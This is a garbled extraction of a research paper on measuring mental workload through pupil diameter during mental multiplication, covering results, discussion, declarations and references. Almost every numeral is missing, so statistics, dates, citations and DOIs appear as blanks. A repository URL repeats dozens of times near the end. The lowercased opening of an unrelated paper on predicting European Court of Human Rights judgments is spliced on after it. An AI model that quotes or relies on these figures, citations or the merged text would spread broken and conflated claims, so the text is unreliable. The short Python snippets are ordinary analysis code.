Results

Mean pupil diameter (MPD)
The MPD during the mental multiplication task is shown in Fig. . It can be seen that at all points in time, the MPD was higher for the higher levels of difficulty. The pattern of the MPD was similar for all levels during the first ten seconds. Figure also shows the results for the period . – . s, split into seven periods with eight points. The means and standard deviations of the MPD for the eight points in time and the three levels of difficulty are shown in Table , together with the effect sizes (dz) and the p-values of the pairwise comparisons. The results confirm that the MPD was significantly higher for the more difficult levels at all points in time.

Figure : Mean pupil diameter (MPD) during the mental multiplication task for the three levels of difficulty. The grey bars represent the periods where the multiplicand and multiplier were shown on the screen. The numbers were masked by an "xx" during the remainder of the trial.

Table : Mean pupil diameter (MPD), mean pupil diameter change (MPDC), mean pupil diameter change rate (MPDCR), NASA-TLX, and mean blink rate (MBR), per level of difficulty of the multiplications. The means (M) and standard deviations (SD) are shown per level of difficulty, together with the p-values (dz) of the pairwise level comparisons. P –P refers to the eight points in time, while ( )–( ) refers to the seven periods; the rows cover the MPD (mm) and MPDC (mm) at P –P , the MPDCR (mm/s) for the seven periods, the NASA-TLX (%) items (total, mental, physical, temporal, performance, effort, and frustration), and the MBR (blinks/s) for the two demand periods. Statistically significant differences are indicated in boldface. n = for the NASA-TLX for all three levels.

Mean pupil diameter change (MPDC)
Figure shows the MPDC as a function of the level of difficulty. As mentioned above, this measure takes into account the shift of the baseline by subtracting the mean of the baseline period of each trial. The difference between the three pupillary responses during the calculation period can now be seen more clearly than for the MPD. Again, the multiplier and calculation periods were split into seven periods by eight points. The results of the analysis of the MPDC at the eight points in time and the three levels of difficulty are shown in Table . A significant difference occurred at points – . The effect size estimate Cohen's dz was also calculated for the MPDC between pairs of difficulty levels for each point in time (see Fig. ). It can be seen that large effect sizes arose from approximately s after the start of the trial, especially between levels and .

Figure : Mean pupil diameter change (MPDC) during the mental multiplication task, for the three levels of difficulty. The grey bars represent the periods where the multiplicand and multiplier were shown on the screen. The numbers were masked by an "xx" during the remainder of the trial.

Figure : Cohen's dz for the mean pupil diameter change (MPDC) between pairs of levels of difficulty. The grey bars represent the periods where the multiplicand and multiplier were shown on the screen. The numbers were masked by an "xx" during the remainder of the trial.

Mean pupil diameter change rate (MPDCR)
Figure shows the MPDCR as a function of the difficulty level for the seven periods. A positive value indicates overall pupil dilation during that period, and a negative value means overall contraction of the pupil diameter. In the first two periods, the diameter increased with approximately equal velocity for the three levels. During the other periods, the velocities decreased and became negative. Significant differences were found between the three conditions (see also Table ).

Figure : Mean pupil diameter change rate (MPDCR), for the three levels of difficulty and for seven periods in time during the presentation of the multiplier and the calculation period. The asterisks indicate statistically significant differences between the levels of difficulty.

Self-reported workload (NASA-TLX)
The results of the NASA-TLX questionnaire are shown in Fig. . For almost all items, the TLX score was significantly higher for the more difficult multiplications (see also Table ). Only the subjective physical workload did not differ significantly between the levels of difficulty.

Pupil diameter of correct versus incorrect responses
The percentages of correct responses for levels , , and were respectively . %, . %, and . % when selecting all trials per level. When considering only those trials that passed the data filtering (see section 'Data processing'), the percentages of correct responses for levels , , and were respectively . % ( of trials), . % ( of trials), and . % ( of trials). Figure shows the MPD for level separated into correct and incorrect responses. Too few incorrect answers were given for the other two levels, and the results for these levels are therefore not reported. There were no significant differences between the MPD for correct and incorrect responses (Table S ).
Figure : Results of the NASA-TLX questionnaire, for the three levels of difficulty. The asterisks indicate statistically significant differences between the levels of difficulty.

Figure : Mean pupil diameter (MPD) during the mental multiplication task for the third level of difficulty. A distinction is made between correct and incorrect responses. The grey bars represent the periods where the multiplicand and multiplier were shown on the screen. The numbers were masked by an "xx" during the remainder of the trial.

Blink rate
Table shows that the MBR of level was higher, but not significantly so, than the MBR of levels and . However, for each level of difficulty, the MBR was higher during periods with low mental demands ( – . s) than during periods with higher mental demands ( . – . s). Figure illustrates the cumulative number of blinks as a function of time. It can be seen that participants were likely to blink at distinct moments in time, namely right after the start of the trial (∼ . s), right after the presentation of the multiplicand (∼ . s), and after the presentation of the multiplier (∼ . s).

Figure : Mean cumulative number of blinks during the mental multiplication task for the three levels of difficulty.

Correlations between MPDC, NASA-TLX, and proportion of incorrect responses
The results of the correlation analyses between the MPDC, NASA-TLX, and proportion of incorrect responses are shown in Table . For the MPDC and NASA-TLX, the table shows overall positive correlations for the eight points in time and for the three different levels of difficulty. Between the MPDC and the percentage of incorrect responses, three statistically significant positive correlation coefficients were observed at points and . Furthermore, Table shows that people who experienced higher subjective workload (i.e., a higher NASA-TLX score) generally gave more incorrect responses.

Table : Pearson's correlations (r) between the mean pupil diameter change (MPDC), percentage of incorrect responses, and the overall NASA-TLX scores, for the three levels of difficulty. Correlations and p-values are listed per level and for the mean of the levels, for the MPDC vs. the overall NASA-TLX at P –P , the MPDC vs. the percentage of incorrect responses at P –P , and the overall NASA-TLX vs. the percentage of incorrect responses. Statistically significant correlations are indicated in boldface.
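The following is a minimal sketch of this correlation analysis across participants, assuming one MPDC value per participant at a given time point, one overall NASA-TLX score, and one percentage of incorrect responses. The variable and function names are hypothetical.

```python
from scipy import stats

def correlate(mpdc_at_point, nasa_tlx_overall, pct_incorrect):
    """Pearson correlations between per-participant MPDC at one time point,
    overall NASA-TLX score, and percentage of incorrect responses."""
    r_tlx, p_tlx = stats.pearsonr(mpdc_at_point, nasa_tlx_overall)
    r_err, p_err = stats.pearsonr(mpdc_at_point, pct_incorrect)
    r_tlx_err, p_tlx_err = stats.pearsonr(nasa_tlx_overall, pct_incorrect)
    return {
        "mpdc_vs_tlx": (r_tlx, p_tlx),
        "mpdc_vs_incorrect": (r_err, p_err),
        "tlx_vs_incorrect": (r_tlx_err, p_tlx_err),
    }
```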
Discussion

Pupil diameter results
The results showed that the MPD was higher for the higher levels of difficulty at all eight points of the calculation period, with points and exhibiting the largest differences. The MPD findings demonstrate that the baseline of the pupil diameter can shift during mental activity. If the pupil had been given more time to recover from the previous trial by increasing the length of the accommodation period, the difference in MPD between the three levels of difficulty in the first period would probably have been smaller.

A remarkable finding is the behavior of the MPD during the first . s of the accommodation period. Where a clear decline from the start, or a horizontal line, might be expected, the MPD starts to decline only after about . s. This unexpected finding may have been caused by the fact that participants looked away from the center of the screen when their outcome to the multiplication had to be entered. Although the responses were not given during the accommodation period, the fluctuation could be an aftereffect, because the trials came in relatively quick succession. During the presentation of the multiplicand and the pause ( – . s), the MPD decreased further, although at a slower pace, which seems to indicate memory load (cf. Kahneman & Beatty, ). A small increase of the pupil diameter after the presentation of the first number was also observed by Ahern ( ) and Klingner ( ).

The MPDC has the advantage over the MPD that it corrects for fluctuations in the baseline pupil diameter, and hence compensates for any structural temporal trends that might exist. The use of the MPDC is appropriate compared to other types of measures, such as percent dilation, because, as pointed out by Beatty & Lucero-Wagoner ( ), "the extent of the pupillary dilation evoked by cognitive processing is independent of baseline pupillary diameter over a wide range of baseline values." (p. ). What is notable in the MPDC results (Fig. ) is that the pupillary behavior for the three difficulty levels was highly similar during the first few seconds after the presentation of the multiplier ( . – s). This might be due to the strategy that the participants used. One can imagine that the first step in each multiplication, regardless of its difficulty, is similar. For example, the first step for many people in the level multiplication × would probably be × . This is comparable to the first step of the level multiplication × , which would then be × . These observations are in line with the TEPRs obtained by Ahern ( ), who found a similar response between the three levels of difficulty at the beginning of the calculation. The MPDC during the other periods was found to differ significantly between the three levels, particularly when levels and were compared to level .

The results of the MPDCR illustrate that its effect sizes are smaller than those of the MPDC measure. Presumably, the MPDCR is less sensitive to changes in mental workload because it represents second-to-second changes in pupil diameter rather than the pupil diameter itself (either absolute, as in the MPD, or relative to a baseline, as in the MPDC). As with any first-order derivative of a signal, the MPDCR might be more sensitive to noise and unsystematic moment-to-moment fluctuations in pupil diameter. Nonetheless, the MPDCR does provide a clear indication of when the muscles of the pupil respond, and hence when the mental workload increases or decreases.
An interesting question related to Fig. , showing the trials with correct versus incorrect responses, is: were the participants really trying to complete the task, or did they give up because it was too difficult? If the latter were the case, one would expect an early decline of the MPD. The opposite is true, however: a small increase of the MPD was measured, suggesting that the participants were trying hard to complete the task until the time was up.

Self-reported workload (NASA-TLX)
According to the results of the NASA-TLX questionnaire, the classification of the arithmetic tasks was done properly, since a statistically significant difference was found in the subjective mental workload across all three levels. The large contrast between the subjective mental and physical workload underlines that the task was predominantly mentally rather than physically demanding. Not to be overlooked are the roles of the subjective temporal demand and frustration. Looking at the increase of the MPD for the incorrect responses after s for level (Fig. ), it is plausible that, although the results were not statistically significant, this increase was caused by the time pressure of the task, or by the anxiety or frustration of not yet having solved the multiplication, rather than by increased task demands.

Blink rate
The relation between mental workload and blink rate has been unclear in the literature (e.g., Kramer, ; Marquart, Cabrall & De Winter, ; Recarte et al., ). The results of the present study show that the MBR was slightly higher for level than for levels and . Contrastingly, the MBR was higher during the low mental demand period ( – . s) than during the high demand period ( . – . s). The temporal analysis (Fig. ) indicated that people blinked particularly at those moments when the visual demand was reduced, such as right after the start of the task and right after the presentation of the multiplier. In summary, consistent with prior research, the relationship between mental workload and blink rate is complex, and it appears that blink rate is governed not only by mental demands but also by visual demands (see also Marquart, Cabrall & De Winter, ).

Correlations between MPDC, NASA-TLX, and proportion of incorrect responses
Moderate to strong correlations were found between the MPDC and the proportion of incorrect responses. A similar but weaker effect was obtained between the MPDC and the NASA-TLX. Thus, the MPDC was higher for participants who gave more incorrect responses and who reported a higher workload on the NASA-TLX. Negative correlations between the pupil diameter and the proportion of correct responses were also found by Ahern ( ), Payne, Parry & Harasymiw ( ), and Recarte et al. ( ). These findings could be useful for determining the feasibility of using the pupil diameter in human-machine applications such as adaptive automation, which is "an approach to automation design where tasks are dynamically allocated between the human operator and computer systems" (Byrne & Parasuraman, , p. ).

Conclusions and recommendations
It is concluded that the results of Ahern ( ) and Klingner ( ) have been accurately replicated with the SmartEye DR remote eye tracker. The Cohen's dz effect size between the MPDC of level and level was . at maximum (at point ), which was about the same (dz = . ) as for the NASA-TLX overall score.
This finding demonstrates that pupil diameter measurements can be just as valid as the NASA-TLX. In our research, an attempt was made to provide more insight into the individual differences of TEPRs by means of a correlation analysis. The results showed a few moderate to strong correlations at the beginning of the calculation period between the MPDC and the NASA-TLX, on the one hand, and the percentage of incorrect responses, on the other. Thus, it seems possible to assess workload by tracking the pupil diameter. However, the validity of pupil diameter measurements may need improvement before it can be implemented in practice. Future research could focus on improving signal analysis techniques that filter out effects other than mental workload, such as the light reflex.

It is challenging to enhance the applicability of pupillometry towards tasks that require fixation on different types of targets. Janisse ( ) previously concluded that research that uses pictorial stimuli should "be interpreted with caution, and perhaps be discounted." (p. ). One possible way to use the pupil diameter in visually complex tasks might be to correct in real time for the amount of light that enters the eye. Janisse proposed such an approach as early as : "the simultaneous monitoring of pupil size and eye movements (points of focus) as subjects view pictorial stimuli might allow one to mathematically 'correct' pupil size as a function of the brightness of the point on which the subject's gaze is falling at a given time." (p. ). Because modern remote eye trackers measure gaze direction and pupil diameter simultaneously, such an approach comes within practical reach, as also discussed by Klingner ( ); a hypothetical sketch of such a correction is given at the end of this section. For further reading on approaches to pupillometry in complex visual environments, see Palinko & Kun ( ; a driving simulator) and Klingner ( ; visual search and map reading).

Additionally, validity could be improved by combining pupillometry with other physiological measures (e.g., Haapalainen et al., ; Just, Carpenter & Miyake, ; Kahneman et al., ; Satterthwaite et al., ; Van der Molen et al., ). For example, Haapalainen et al. ( ) used an electrocardiogram (ECG)-enabled armband, a remote eye tracker, and a wireless electroencephalogram (EEG) headset to collect various physiological signals simultaneously. The authors concluded that heat flux and heart rate variability in combination provided a classification accuracy of over % between conditions of low and high mental workload. In that study, the pupil diameter did not perform strongly as a classifier ( %), presumably due to data loss of the eye tracker. A primary advantage of pupillometry in such multivariate applications is that the pupil diameter reacts rapidly to changes in task conditions (cf. Fig. ), while measures such as heat flux, galvanic skin response, or heart rate have considerably longer time constants.
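The gaze-contingent correction proposed by Janisse could, in principle, look like the sketch below: the measured pupil diameter is adjusted for the luminance of the screen region the participant is looking at. The linear correction model and the sensitivity coefficient are assumptions for illustration only; this is not a method used or validated in the present paper.

```python
import numpy as np

def brightness_corrected_pd(pd, gaze_xy, screen_image, sensitivity):
    """Hypothetical gaze-contingent light-reflex correction.

    pd           : measured pupil diameter (mm)
    gaze_xy      : (col, row) gaze point in screen pixels
    screen_image : 2-D array of screen luminance values in [0, 1]
    sensitivity  : assumed mm change in pupil diameter per unit luminance
    """
    col, row = (int(round(v)) for v in gaze_xy)
    local_luminance = screen_image[row, col]
    mean_luminance = screen_image.mean()
    # Remove the estimated light-reflex component relative to the average
    # screen luminance (a simple linear model, chosen only for illustration).
    return pd + sensitivity * (local_luminance - mean_luminance)
```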
Additional Information and Declarations

Funding
The authors received no funding for this work.

Competing Interests
The authors declare there are no competing interests.

Author Contributions
• Gerhard Marquart conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, and reviewed drafts of the paper.
• Joost de Winter conceived and designed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, and reviewed drafts of the paper.

Ethics
The following information was supplied relating to ethical approvals (i.e., approving body and any reference numbers): the research was approved by the Human Research Ethics Committee (HREC) of the Delft University of Technology (TU Delft, 'Workload assessment for mental arithmetic tasks using the task-evoked pupillary response', January , ).

Data Availability
The following information was supplied regarding the deposition of related data: the experimenter software and analysis scripts are available as Supplemental Files; as the raw data files are quite large, they are currently hosted at http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /supplementary_material_gerhard_marquart.zip.
Supplemental Information
Supplemental information for this article can be found online at http://dx.doi.org/ . /peerj-cs. #supplemental-information.

References
Ahern SK. . Activation and intelligence: pupillometric correlates of individual differences in cognitive abilities. Doctoral dissertation, University of California.
Beatty J. . Task-evoked pupillary responses, processing load, and the structure of processing resources. Psychological Bulletin : – DOI . / - . . . .
Beatty J, Lucero-Wagoner B. . The pupillary system. In: Cacioppo J, Tassinary LG, Berntson GG, eds. The Handbook of Psychophysiology. Cambridge: Cambridge University Press, – .
Beatty J, Wilson CO. . Activation and sustained attention: a pupillometric study of an auditory vigilance task. Technical Report . Los Angeles: University of California.
Boersma F, Wilton K, Barham R, Muir W. . Effects of arithmetic problem difficulty on pupillary dilation in normals and educable retardates. Journal of Experimental Child Psychology : – DOI . / - ( ) - .
Bradshaw JL. . Pupil size and problem solving. Quarterly Journal of Experimental Psychology : – DOI . / .
Byrne EA, Parasuraman R. . Psychophysiology and adaptive automation. Biological Psychology : – DOI . / - ( ) - .
Goldinger SD, Papesh MH. . Pupil dilation reflects the creation and retrieval of memories. Psychological Science : – DOI . / .
Granholm E, Steinhauer SR. . Pupillometric measures of cognitive and emotional processes. International Journal of Psychophysiology : – DOI . /j.ijpsycho. . . .
Haapalainen E, Kim S, Forlizzi JF, Dey AK. . Psycho-physiological measures for assessing cognitive load. In: Proceedings of the th ACM International Conference on Ubiquitous Computing, – .
Hart SG, Staveland LE. . Development of NASA-TLX (Task Load Index): results of empirical and theoretical research. In: Hancock PA, Meshkati N, eds. Human Mental Workload. Amsterdam: North Holland Press, – .
Hess EH, Polt JM. . Pupil sizes in relation to mental activity during simple problem-solving. Science : – DOI . /science. . . .
Janisse MP. . Pupillometry: The Psychology of the Pupillary Response. Washington, DC: Hemisphere.
Just MA, Carpenter PA, Miyake A. . Neuroindices of cognitive workload: neuroimaging, pupillometric and event-related potential studies of brain work. Theoretical Issues in Ergonomics Science : – DOI . / .
Kahneman D, Beatty J. . Pupil diameter and load on memory. Science : – DOI . /science. . . .
Kahneman D, Tursky B, Shapiro D, Crider A. . Pupillary, heart rate, and skin resistance changes during a mental task. Journal of Experimental Psychology : – DOI . /h .
Klingner J. . Measuring cognitive load during visual tasks by combining pupillometry and eye tracking. Doctoral dissertation, Stanford University.
Klingner J, Kumar R, Hanrahan P. . Measuring the task-evoked pupillary response with a remote eye tracker. In: Proceedings of the Symposium on Eye Tracking Research & Applications, – .
Kramer AF. . Physiological metrics of mental workload: a review of recent progress. In: Damos DL, ed. Multiple-Task Performance. London: Taylor & Francis, – .
Laeng B, Sirois S, Gredebäck G. . Pupillometry: a window to the preconscious? Perspectives on Psychological Science : – DOI . / .
Marquart G. . Pupil light reflex suppression by variable screen brightness. Available at http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf.
Marquart G, Cabrall C, de Winter JCF. . Review of eye-related measures of drivers' mental workload. In: Proceedings of the th International Conference on Applied Human Factors and Ergonomics. Las Vegas DOI . /j.promfg. . . .
Marshall SP. . Method and apparatus for eye tracking and monitoring pupil dilation to evaluate cognitive activity. US Patent No. , , .
Marshall SP. . Identifying cognitive state from eye metrics. Aviation, Space, and Environmental Medicine :B –B .
Palinko O, Kun A, Shyrokov A, Heeman P. . Estimating cognitive load using remote eye tracking in a driving simulator. In: Proceedings of the Symposium on Eye-Tracking Research & Applications, – .
Palinko O, Kun A. . Exploring the influence of light and cognitive load on pupil diameter in driving simulators. In: Proceedings of the Sixth International Driving Symposium on Human Factors in Driver Assessment, Training and Vehicle Design, – .
Payne DT, Parry ME, Harasymiw SJ. . Percentage of pupillary dilation as a measure of item difficulty. Perception & Psychophysics : – DOI . /BF .
Pomplun M, Sunkara S. . Pupil dilation as an indicator of cognitive workload in human–computer interaction. In: Proceedings of the Tenth International Conference on Human–Computer Interaction, Vol. , – .
Recarte MA, Pérez E, Conchillo A, Nunes LM. . Mental workload and visual impairment: differences between pupil, blink, and subjective rating. The Spanish Journal of Psychology : – .
Satterthwaite TD, Green L, Myerson J, Parker J, Ramaratnam M, Buckner RL. . Dissociable but inter-related systems of cognitive control and reward during decision making: evidence from pupillometry and event-related fMRI. NeuroImage : – DOI . /j.neuroimage. . . .
Schaefer Jr T, Brinton Ferguson J, Klein JA, Rawson EB. . Pupillary responses during mental activities. Psychonomic Science : – DOI . /BF .
Schwalm M, Keinath A, Zimmer HD. . Pupillometry as a method for measuring mental workload within a simulated driving task. In: de Waard D, Flemisch F, Lorenz B, Oberheid H, Brookhuis K, eds. Human Factors for Assistance and Automation. Maastricht: Shaker Publishing, – .
Smart Eye AB. . Programmer's Guide, Revision . . Gothenburg, Sweden.
Tryon WW. . Pupillometry: a survey of sources of variation. Psychophysiology : – DOI . /j. - . .tb .x.
/ http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- 
- cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf http://repository.tudelft.nl/assets/uuid:c edcab- - cd -b - eb bab /thesis_report_gerhard_marquart.pdf 
submitted may accepted september published october corresponding author nikolaos aletras, nikos.aletras@gmail.com academic editor lexing xie additional information and declarations can be found on page doi . /peerj-cs. copyright aletras et al. distributed under creative commons cc-by . open access predicting judicial decisions of the european court of human rights: a natural language processing perspective nikolaos aletras , , dimitrios tsarapatsanis , daniel preoţiuc-pietro , and vasileios lampos amazon.com, cambridge, united kingdom; department of computer science, university college london, university of london, london, united kingdom; school of law, university of sheffield, sheffield, united kingdom; positive psychology center, university of pennsylvania, philadelphia, united states; computer & information science, university of pennsylvania, philadelphia, united states abstract recent advances in natural language processing and machine learning provide us with the tools to build predictive models that can be used to unveil patterns driving judicial decisions. this can be useful, for both lawyers and judges, as an assisting tool to rapidly identify cases and extract patterns which lead to certain decisions. this paper presents the first systematic study on predicting the outcome of cases tried by the european court of human rights based solely on textual content. we formulate a binary classification task where the input of our classifiers is the textual content extracted from a case and the target output is the actual judgment as to whether there has been a violation of an article of the convention on human rights. textual information is represented using contiguous word sequences, i.e., n-grams, and topics. our models can predict the court's decisions with a strong accuracy ( % on average). our empirical analysis indicates that the formal facts of a case are the most important predictive factor. this is consistent with the theory of legal realism suggesting that judicial decision-making is significantly affected by the stimulus of the facts. we also observe that the topical content of a case is another important feature in this classification task and explore this relationship further by conducting a qualitative analysis. subjects artificial intelligence, computational linguistics, data mining and machine learning, data science, natural language and speech keywords natural language processing, text mining, legal science, machine learning, artificial intelligence, judicial decisions introduction in his prescient work on investigating the potential use of information technology in the legal domain, lawlor surmised that computers would one day become able to analyse and predict the outcomes of judicial decisions (lawlor, ). according to lawlor, reliable prediction of the activity of judges would depend on a scientific understanding of the ways that the law and the facts impact on the relevant decision-makers, i.e., the judges. more than fifty years later, the advances in natural language processing (nlp) and machine learning (ml) provide us with the tools to automatically analyse legal materials, so as to build successful predictive models of judicial outcomes.
how to cite this article aletras et al. ( ), predicting judicial decisions of the european court of human rights: a natural language processing perspective. peerj comput. sci. :e ; doi . /peerj-cs. an amicus curiae (friend of the court) is a person or organisation that offers testimony before the court in the context of a particular case without being a formal party to the proceedings. in this paper, our particular focus is on the automatic analysis of cases of the european court of human rights (ecthr or court). the ecthr is an international court that rules on individual or, much more rarely, state applications alleging violations by some state party of the civil and political rights set out in the european convention on human rights (echr or convention). our task is to predict whether a particular article of the convention has been violated, given textual evidence extracted from a case, which comprises specific parts pertaining to the facts, the relevant applicable law and the arguments presented by the parties involved. our main hypotheses are that ( ) the textual content, and ( ) the different parts of a case are important factors that influence the outcome reached by the court. these hypotheses are corroborated by the results. our work lends some initial plausibility to a text-based approach with regard to ex ante prediction of ecthr outcomes, on the assumption that the text extracted from published judgments of the court bears a sufficient number of similarities with, and can therefore stand as a (crude) proxy for, applications lodged with the court as well as for briefs submitted by parties in pending cases. we submit, though, that full acceptance of that reasonable assumption necessitates more empirical corroboration. be that as it may, our more general aim is to work under this assumption, thus placing our work within the larger context of ongoing empirical research in the theory of adjudication about the determinants of judicial decision-making. accordingly, in the discussion we highlight ways in which automatically predicting the outcomes of ecthr cases could potentially provide insights on whether judges follow a so-called legal model (grey, ) of decision making or whether their behavior conforms to the legal realists' theorization (leiter, ), according to which judges primarily decide cases by responding to the stimulus of the facts of the case. we define the problem of ecthr case prediction as a binary classification task. we utilise textual features, i.e., n-grams and topics, to train support vector machine (svm) classifiers (vapnik, ). we apply a linear kernel function that facilitates the interpretation of models in a straightforward manner. our models can reliably predict ecthr decisions with high accuracy, i.e., % on average. results indicate that the 'facts' section of a case best predicts the actual court's decision, which is more consistent with legal realists' insights about judicial decision-making. we also observe that the topical content of a case is an important indicator of whether there is a violation of a given article of the convention or not. previous work on predicting judicial decisions, representing disciplinary backgrounds in political science and economics, has largely focused on the analysis and prediction of judges' votes given non-textual information, such as the nature and the gravity of the crime or the preferred policy position of each judge (kort, ; nagel, ; keown, ; segal, ; popple, ; lauderdale & clark, ).
